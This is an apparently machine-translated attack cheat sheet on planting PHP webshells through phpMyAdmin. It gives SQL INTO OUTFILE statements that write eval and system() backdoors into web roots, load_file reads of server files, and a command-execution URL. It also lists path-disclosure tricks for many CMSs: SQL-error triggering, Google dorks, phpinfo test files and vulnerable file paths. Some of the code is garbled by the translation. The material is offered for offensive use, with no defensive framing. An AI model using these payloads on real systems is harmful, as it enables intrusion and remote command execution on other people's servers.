Obtain the webshell method summary in the phpmyadmin background
Method 1:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
---- Run the preceding command at the same time. Create a table named xiaoma in the database: mysql and export it to E:/wamp/www/7. php one-sentence connection password: xiaoma Method 2:
Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>'); select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS xiaoma;
Method 3: Read the file content: select load_file ('e:/xamp/www/s. php'); write a sentence: select' <? Php @ eval ($ _ POST [cmd])?> 'Into outfile' E:/xamp/www/xiaoma. php' Command Execution permission: select' <? Php echo \ '<pre >\'; system ($ _ GET [\ 'cmd \']); echo \ '</pre> \';?> 'Into outfile' E:/xamp/www/xiaoma. php' Method 4: select load_file ('e:/xamp/www/xiaoma. php'); select' <? Php echo \ '<pre >\'; system ($ _ GET [\ 'cmd \']); echo \ '</pre> \';?> 'Into outfile' E:/xamp/www/xiaoma. php' and visit the website directory: http://www.xxxx.com/xiaoma.php?cmd=dir Collection of php burst paths: 1. Description of single quotes burst paths: Add single quotes directly behind the URL. Single quotes are not filtered (gpc = off) and the server returns error messages by default. Www.xxx.com/news.php? Id = 149 '2. Description of the path where the error parameter value is aborted: Change the parameter value to be submitted to an error value, for example,-1. -99999 try to filter single quotes. Www.xxx.com/researcharchive.php? Id =-1 3. Google burst path Description: searches for webpage snapshots of error pages based on keywords and site syntax. Common keywords include warning and fatal error. Note: If the target site is a second-level domain name, the site is connected to its corresponding top-level domain name, resulting in much more information. Site: xxx.edu.tw warningSite: xxx.com.tw "fatal error" 4. Test File explosion path Description: many websites have test files under the root directory, and the script code is usually phpinfo ().
www.xxx.com/test.phpwww.xxx.com/ceshi.phpwww.xxx.com/info.phpwww.xxx.com/phpinfo.phpwww.xxx.com/php_info.phpwww.xxx.com/1.php
5. phpmyadmin burst path Description: once you find the phpmyadmin Management page and access some specific files in the directory, the physical path may pop up. For phpmyadmin addresses, you can use tools such as wwwscan or google. PS: Some BT websites are written as phpMyAdmin. 1./phpmyadmin/libraries/lect_lang.lib.php2./phpMyAdmin/index. php? Lang [] = 13. /phpMyAdmin/phpinfo. php4. load_file () 5. /phpmyadmin/themes/darkblue_orange/layout. inc. php6./phpmyadmin/libraries/select_lang.lib.php7. /phpmyadmin/libraries/lect_lang.lib.php8. /phpmyadmin/libraries/mcrypt. lib. php 6. path finding for the configuration file Description: If the injection point has the file read permission, you can manually load_file or the tool to read the configuration file and then find the path information (usually at the end of the file ). The default paths of Web servers and PHP configuration files on various platforms can be checked online.
Windows: c: \ windows \ php. ini php configuration file c: \ windows \ system32 \ inetsrv \ MetaBase. xml IIS virtual host configuration file Linux:/etc/php. ini php configuration file/etc/httpd/conf. d/php. conf/etc/httpd/conf/httpd. conf Apache configuration file/usr/local/apache/conf/httpd. conf/usr/local/apache2/conf/httpd. conf/usr/local/apache/conf/extra/httpd-vhosts.conf virtual directory configuration file
7. nginx file type error parsing explosion path Description: This is a method that was accidentally discovered yesterday. Of course, the Web server is required to be nginx and there is a file type Parsing Vulnerability. Sometimes/x. php is added after the image address. This image will not only be executed as a php file, but may also expose the physical path. Www.xxx.com/top.jpg/x.php 8, other dedecms/member/templets/menu.pdf. phpplus/paycenter/alipay/return_url.php plus/paycenter/cbpayment/autoreceive. phppaycenter/nps/config_pay_nps.phpplus/task/dede-maketimehtml.phpplus/task/dede-optimize-table.phpplus/task/dede-upcache.php WPwp-admin/DES/file. phpwp-content/themes/baiaogu-seo/footer. php ecshop mall system brute-force Path Vulnerability File
/api/cron.php/wap/goods.php/temp/compiled/ur_here.lbi.php/temp/compiled/pages.lbi.php/temp/compiled/user_transaction.dwt.php/temp/compiled/history.lbi.php/temp/compiled/page_footer.lbi.php/temp/compiled/goods.dwt.php/temp/compiled/user_clips.dwt.php/temp/compiled/goods_article.lbi.php/temp/compiled/comments_list.lbi.php/temp/compiled/recommend_promotion.lbi.php/temp/compiled/search.dwt.php/temp/compiled/category_tree.lbi.php/temp/compiled/user_passport.dwt.php/temp/compiled/promotion_info.lbi.php/temp/compiled/user_menu.lbi.php/temp/compiled/message.dwt.php/temp/compiled/admin/pagefooter.htm.php/temp/compiled/admin/page.htm.php/temp/compiled/admin/start.htm.php/temp/compiled/admin/goods_search.htm.php/temp/compiled/admin/index.htm.php/temp/compiled/admin/order_list.htm.php/temp/compiled/admin/menu.htm.php/temp/compiled/admin/login.htm.php/temp/compiled/admin/message.htm.php/temp/compiled/admin/goods_list.htm.php/temp/compiled/admin/pageheader.htm.php/temp/compiled/admin/top.htm.php/temp/compiled/top10.lbi.php/temp/compiled/member_info.lbi.php/temp/compiled/bought_goods.lbi.php/temp/compiled/goods_related.lbi.php/temp/compiled/page_header.lbi.php/temp/compiled/goods_script.html.php/temp/compiled/index.dwt.php/temp/compiled/goods_fittings.lbi.php/temp/compiled/myship.dwt.php/temp/compiled/brands.lbi.php/temp/compiled/help.lbi.php/temp/compiled/goods_gallery.lbi.php/temp/compiled/comments.lbi.php/temp/compiled/myship.lbi.php/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php/includes/modules/cron/auto_manage.php/includes/modules/cron/ipdel.php
Ucenter explosion path ucenter \ control \ admin \ db. php DZbbsmanyou/admincp. php? My_suffix = % 0A % 0DTOBY57 z-blogadmin/FCKeditor/editor/dialog/fck % 5 Fspellerpages/spellerpages/server % 2 Dscripts/spellchecker. php php168 burst path admin/inc/hack/count. php? Job = listadmin/inc/hack/search. php? Job = getcodeadmin/inc/ajax/bencandy. php? Job = docache/MysqlTime.txt after the PHPcms2008-sp4 registers a user to log on to phpcms/corpandresize/process. php? Pic = .. /images/logo.gif bo-blogPoC:/go. php/<[edevil code] CMSeasy website Path Vulnerability found in the menu_top.php file lib/MoD/celive/menu_top.php/lib/default/ballot_act.phplib/default/special_act.php